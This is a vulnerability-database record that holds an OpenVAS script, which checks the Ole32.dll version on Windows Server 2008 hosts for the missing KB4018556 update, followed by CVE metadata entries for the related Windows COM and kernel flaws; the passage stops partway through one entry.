{"id": "OPENVAS:1361412562310811118", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft COM Multiple Vulnerabilities (KB4018556)", "description": "This host is missing an important security\n update according to Microsoft KB4018556", "published": "2017-05-10T00:00:00", "modified": "2020-06-04T00:00:00", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811118", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-gb/help/4018556"], "cvelist": ["CVE-2017-0244", "CVE-2017-0214", "CVE-2017-0258", "CVE-2017-0213"], "lastseen": "2020-06-08T23:19:54", "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:6D4430B5-2DD4-4277-B666-3F202D23AD1B"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0366", "CPAI-2017-0369", "CPAI-2017-0379"]}, {"type": "cve", "idList": ["CVE-2017-0175", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0244", "CVE-2017-0258", "CVE-2017-0259"]}, {"type": "fireeye", "idList": ["FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B"]}, {"type": "githubexploit", "idList": ["FB99D0AC-3747-583A-AE7D-EE0F4E626D66"]}, {"type": "kaspersky", "idList": ["KLA11009", "KLA11077"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0213", "MS:CVE-2017-0214", "MS:CVE-2017-0244", "MS:CVE-2017-0258"]}, {"type": "mskb", "idList": ["KB4018556", "KB4466388"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786826"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-MAY_4019214.NASL", "SMB_NT_MS17_MAY_4016871.NASL", "SMB_NT_MS17_MAY_4019215.NASL", "SMB_NT_MS17_MAY_4019264.NASL", "SMB_NT_MS17_MAY_4019472.NASL", "SMB_NT_MS17_MAY_4019473.NASL", "SMB_NT_MS17_MAY_4019474.NASL", "SMB_NT_MS17_MAY_WIN2008.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811107", "OPENVAS:1361412562310811108", "OPENVAS:1361412562310811110", "OPENVAS:1361412562310811111", "OPENVAS:1361412562310811112", "OPENVAS:1361412562310811113", "OPENVAS:1361412562310811114"]}, {"type": "seebug", "idList": ["SSV:96267"]}, {"type": "symantec", "idList": ["SMNTC-98102", "SMNTC-98103", "SMNTC-98109", "SMNTC-98112"]}, {"type": "threatpost", "idList": ["THREATPOST:22AA852BEEA43B18D4341D7ADA922536", "THREATPOST:3649750E149C0B00551806E47C047B39"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:278CA36BE7BE1D87941A99D03E2C3D5B"]}, {"type": "zdt", "idList": ["1337DAY-ID-27776", "1337DAY-ID-27797", "1337DAY-ID-27798"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:6D4430B5-2DD4-4277-B666-3F202D23AD1B"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0366", "CPAI-2017-0369", "CPAI-2017-0379"]}, {"type": "cve", "idList": ["CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0244", "CVE-2017-0258"]}, {"type": "fireeye", "idList": ["FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B"]}, {"type": "githubexploit", "idList": ["FB99D0AC-3747-583A-AE7D-EE0F4E626D66"]}, {"type": "kaspersky", "idList": ["KLA11009"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0213", "MS:CVE-2017-0214", "MS:CVE-2017-0244", "MS:CVE-2017-0258"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786826"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_MAY_4019264.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811107", "OPENVAS:1361412562310811108", "OPENVAS:1361412562310811110", "OPENVAS:1361412562310811111", "OPENVAS:1361412562310811112", "OPENVAS:1361412562310811113", "OPENVAS:1361412562310811114"]}, {"type": "seebug", "idList": ["SSV:96267"]}, {"type": "symantec", "idList": ["SMNTC-98109"]}, {"type": "threatpost", "idList": ["THREATPOST:22AA852BEEA43B18D4341D7ADA922536"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:278CA36BE7BE1D87941A99D03E2C3D5B"]}, {"type": "zdt", "idList": ["1337DAY-ID-27797"]}]}, "exploitation": null, "vulnersScore": 0.2}, "pluginID": "1361412562310811118", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft COM Multiple Vulnerabilities (KB4018556)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811118\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0244\", \"CVE-2017-0258\");\n script_bugtraq_id(98112, 98109, 98103, 98102);\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:51:18 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft COM Multiple Vulnerabilities (KB4018556)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4018556\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - The Windows kernel improperly initializes objects in memory.\n\n - The way that the Windows Kernel handles objects in memory.\n\n - Windows fails to properly validate input before loading type libraries.\n\n - An unspecified error in Windows COM Aggregate Marshaler.\");\n\n script_tag(name:\"impact\", value:\"An attacker who successfully exploited the\n vulnerability can elevate their privilege level, can lead to denial of\n service condition, could obtain information to further compromise the users\n system and run arbitrary code with elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4018556\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nif(!asVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\")){\n exit(0);\n}\n\nif(version_is_less(version:asVer, test_version:\"6.0.6002.19773\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19773\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:asVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24088\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24088\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Ole32.dll\" + '\\n' +\n 'File version: ' + asVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "naslFamily": "Windows : Microsoft Bulletins", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659709850}}
{"attackerkb": [{"lastseen": "2022-07-21T02:03:43", "description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \u201cWindows COM Elevation of Privilege Vulnerability\u201d. This CVE ID is unique from CVE-2017-0214.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T00:00:00", "type": "attackerkb", "title": "CVE-2017-0213", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2021-07-27T00:00:00", "id": "AKB:6D4430B5-2DD4-4277-B666-3F202D23AD1B", "href": "https://attackerkb.com/topics/1PgDqHxZcV/cve-2017-0213", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T11:50:36", "description": "Windows COM in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when Windows fails to properly validate input before loading type libraries, aka \"Windows COM Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-0213.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0214", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0214", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0214", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:35", "description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \"Windows COM Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-0214.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0213", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0213", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0213", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:03", "description": "The kernel in Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows locally authenticated attackers to gain privileges via a crafted application, or in Windows 7 for x64-based systems, cause denial of service, aka \"Windows Kernel Elevation of Privilege Vulnerability.\"", "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0244", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0244"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2017-0244", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0244", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:49:58", "description": "The Windows kernel in Windows Server 2008 SP2 and R2 SP1, and Windows 7 SP1 allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0220, CVE-2017-0258, and CVE-2017-0259.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0175", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2018-10-30T16:28:00", "cpe": ["cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2017-0175", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0175", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:50:42", "description": "The Windows kernel in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, and Windows Server 2012 Gold allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0175, CVE-2017-0258, and CVE-2017-0259.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0220", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2017-08-13T01:29:00", "cpe": ["cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0220", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0220", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:15", "description": "The Windows kernel in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0175, CVE-2017-0220, and CVE-2017-0259.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0258", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-0258", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0258", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:itanium:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:51:18", "description": "The Windows kernel in Microsoft Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows authenticated attackers to obtain sensitive information via a specially crafted document, aka \"Windows Kernel Information Disclosure Vulnerability,\" a different vulnerability than CVE-2017-0175, CVE-2017-0220, and CVE-2017-0258.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-12T14:29:00", "type": "cve", "title": "CVE-2017-0259", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0175", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0259"], "modified": "2017-08-13T01:29:00", "cpe": ["cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2017-0259", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0259", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": 